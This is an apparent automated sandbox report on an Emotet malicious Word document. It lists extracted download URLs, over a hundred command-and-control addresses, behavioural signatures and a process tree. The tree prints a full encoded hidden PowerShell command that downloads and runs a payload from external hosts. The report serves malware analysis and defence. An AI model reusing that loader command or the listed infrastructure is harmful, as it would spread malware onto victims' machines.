Analysis
-
max time kernel
129s -
resource
win10v191014 -
submitted
09-12-2019 16:58
Task
task1
Sample
Docs_b147ef181809997d173ebc4242d4a74d.37.doc
Resource
win7v191014
General
Malware Config
Extracted
http://www.aitb66.com/wp-admin/wdm12182/
http://zisoft.zinad.net/wp-content/7flgzi080/
http://ausflugemarrakesh.com/cgi-bin/512/
http://axis-gps.com/pzdjz/hgpu56/
https://xploremotions.com/rtrx/c656/
Extracted
emotet
76.221.133.146:80
104.33.129.244:80
172.90.70.168:8080
96.126.121.64:443
104.236.137.72:8080
172.104.233.225:8080
85.234.143.94:8080
50.28.51.143:8080
190.186.164.23:80
47.146.42.234:80
63.246.252.234:80
80.29.54.20:80
68.183.190.199:8080
46.28.111.142:7080
183.82.97.25:80
87.106.46.107:8080
188.216.24.204:80
186.68.48.204:443
181.198.203.45:443
88.250.223.190:8080
130.45.45.31:80
119.59.124.163:8080
200.124.225.32:80
46.101.212.195:8080
5.88.27.67:8080
77.241.53.234:80
203.130.0.69:80
62.75.143.100:7080
190.102.226.91:80
200.119.11.118:443
72.29.55.174:80
181.36.42.205:443
91.205.215.57:7080
201.163.74.202:443
14.160.93.230:80
134.209.214.126:8080
45.79.95.107:443
181.231.62.54:80
104.131.58.132:8080
184.184.202.167:443
144.139.56.105:80
80.85.87.122:8080
91.83.93.124:7080
200.58.83.179:80
149.135.123.65:80
144.2.165.179:80
95.179.195.74:80
58.171.181.213:80
201.213.32.59:80
96.20.84.254:7080
142.127.57.63:8080
82.196.15.205:8080
142.93.114.137:8080
109.166.89.91:80
190.146.131.105:8080
163.172.40.218:7080
62.75.160.178:8080
191.103.76.34:443
204.63.252.182:443
190.97.30.167:990
45.50.177.164:80
86.42.166.147:80
149.62.173.247:8080
186.15.83.52:8080
188.14.39.65:443
87.118.70.69:8080
47.187.70.124:443
139.5.237.27:443
87.106.77.40:7080
77.55.211.77:8080
118.200.218.193:443
203.25.159.3:8080
51.255.165.160:8080
178.79.163.131:8080
96.61.113.203:80
190.4.50.26:80
5.196.35.138:7080
217.199.160.224:8080
181.135.153.203:443
185.86.148.222:8080
116.48.138.115:80
190.210.184.138:995
185.160.212.3:80
93.67.154.252:443
202.186.240.165:8080
68.129.203.162:443
37.183.121.32:80
69.163.33.84:8080
212.71.237.140:8080
98.196.49.107:80
2.44.167.52:80
207.154.204.40:8080
138.68.106.4:7080
2.139.158.136:443
79.31.85.103:80
190.195.129.227:8090
181.61.143.177:80
159.203.204.126:8080
83.165.163.225:80
109.169.86.13:8080
125.99.61.162:7080
91.204.163.19:8090
73.167.135.180:80
190.17.42.79:80
190.38.14.52:80
201.190.133.235:8080
200.123.101.90:80
68.183.170.114:8080
82.8.232.51:80
Signatures
-
Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes:
377.exehalgroup.exepid process 3932 377.exe 952 halgroup.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe -
Drops file in System32 directory 6 IoCs
Processes:
halgroup.exe377.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat halgroup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 halgroup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE halgroup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies halgroup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 halgroup.exe File renamed C:\Users\Admin\377.exe => C:\Windows\SysWOW64\halgroup.exe 377.exe -
Processes:
description ioc Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1" -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4968 WINWORD.EXE -
Executes dropped EXE 4 IoCs
Processes:
377.exe377.exehalgroup.exehalgroup.exepid process 4388 377.exe 3932 377.exe 4592 halgroup.exe 952 halgroup.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4968 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
SppExtComObj.exePowershell.exe377.exehalgroup.exedescription pid process target process PID 4048 wrote to memory of 4564 4048 SppExtComObj.exe SLUI.exe PID 4628 wrote to memory of 4388 4628 Powershell.exe 377.exe PID 4388 wrote to memory of 3932 4388 377.exe 377.exe PID 4592 wrote to memory of 952 4592 halgroup.exe halgroup.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4628 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
Powershell.exehalgroup.exepid process 4628 Powershell.exe 952 halgroup.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
WINWORD.EXE377.exe377.exehalgroup.exehalgroup.exepid process 4968 WINWORD.EXE 4388 377.exe 3932 377.exe 4592 halgroup.exe 952 halgroup.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_b147ef181809997d173ebc4242d4a74d.37.doc" /o ""1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABSAGIAcgBtAHcAbABxAHkAaAByAD0AJwBSAHEAZAB6AHEAcgBtAHQAcwB4ACcAOwAkAE8AZABrAHUAZwBtAHIAagBnAGIAIAA9ACAAJwAzADcANwAnADsAJABOAHgAbABrAGMAZQBiAGYAYgBhAHoAPQAnAEQAbAByAGgAYwB3AHQAYQBjAHAAJwA7ACQARAB1AGsAcgBhAHkAeQBhAHgAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATwBkAGsAdQBnAG0AcgBqAGcAYgArACcALgBlAHgAZQAnADsAJABUAHAAcAB2AHEAdQByAHAAegBqAG8AZQA9ACcATgBpAGYAcABwAGQAcgBlAG8AJwA7ACQAUQBwAHkAeQBsAHEAaAB6AHoAdgBrAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAFcARQBCAGMAbABpAGUATgB0ADsAJABPAHoAdQBkAG4AZQBjAGkAZQB5AG8APQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBhAGkAdABiADYANgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdwBkAG0AMQAyADEAOAAyAC8AKgBoAHQAdABwADoALwAvAHoAaQBzAG8AZgB0AC4AegBpAG4AYQBkAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANwBmAGwAZwB6AGkAMAA4ADAALwAqAGgAdAB0AHAAOgAvAC8AYQB1AHMAZgBsAHUAZwBlAG0AYQByAHIAYQBrAGUAcwBoAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ANQAxADIALwAqAGgAdAB0AHAAOgAvAC8AYQB4AGkAcwAtAGcAcABzAC4AYwBvAG0ALwBwAHoAZABqAHoALwBoAGcAcAB1ADUANgAvACoAaAB0AHQAcABzADoALwAvAHgAcABsAG8AcgBlAG0AbwB0AGkAbwBuAHMALgBjAG8AbQAvAHIAdAByAHgALwBjADYANQA2AC8AJwAuACIAUwBgAHAATABpAHQAIgAoACcAKgAnACkAOwAkAEsAdQBuAGkAbgBrAGgAYwA9ACcAUABtAGsAbABmAGgAcwBtAHQAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgB5AGgAeQBlAHgAaABkAHgAYgAgAGkAbgAgACQATwB6AHUAZABuAGUAYwBpAGUAeQBvACkAewB0AHIAeQB7ACQAUQBwAHkAeQBsAHEAaAB6AHoAdgBrAC4AIgBkAE8AdwBuAEwAYABPAGAAQQBkAEYAaQBMAGUAIgAoACQAQgB5AGgAeQBlAHgAaABkAHgAYgAsACAAJABEAHUAawByAGEAeQB5AGEAeABoACkAOwAkAFgAagBsAHYAbQBhAGYAYQBwAGIAcABzAD0AJwBFAGcAbQB6AGgAYwB3AHcAeAB2AHUAZQBqACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQARAB1AGsAcgBhAHkAeQBhAHgAaAApAC4AIgBsAGUATgBgAGcAdABoACIAIAAtAGcAZQAgADMANgA5ADEAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAFIAVAAiACgAJABEAHUAawByAGEAeQB5AGEAeABoACkAOwAkAFUAZABwAHIAeABkAHgAcwB4AGgAdwBzAD0AJwBYAHIAZgBnAGQAbABhAHUAcABrAHgAJwA7AGIAcgBlAGEAawA7ACQAUABhAGkAcQBqAGEAeABnAGwAYwA9ACcAQQBqAHUAYgBhAGYAZABjACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQAegBkAHMAbwByAHoAbwBmAHQAdwBzAGkAPQAnAFEAbgByAHcAaABsAG8AcQBkAGMAYgAnAA==1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\377.exe"C:\Users\Admin\377.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\377.exe--11945cd13⤵
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in Windows directory
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DoSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup1⤵
-
C:\Windows\SysWOW64\halgroup.exe"C:\Windows\SysWOW64\halgroup.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\halgroup.exe--ad3245be2⤵
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\377.exe
-
C:\Users\Admin\377.exe
-
C:\Users\Admin\377.exe
-
C:\Windows\SysWOW64\halgroup.exe
-
C:\Windows\SysWOW64\halgroup.exe
-
memory/952-27-0x0000000000E40000-0x0000000000E57000-memory.dmpFilesize
92KB
-
memory/952-28-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/3932-11-0x00000000020F0000-0x0000000002107000-memory.dmpFilesize
92KB
-
memory/3932-12-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/4388-9-0x0000000000680000-0x0000000000697000-memory.dmpFilesize
92KB
-
memory/4592-25-0x0000000000740000-0x0000000000757000-memory.dmpFilesize
92KB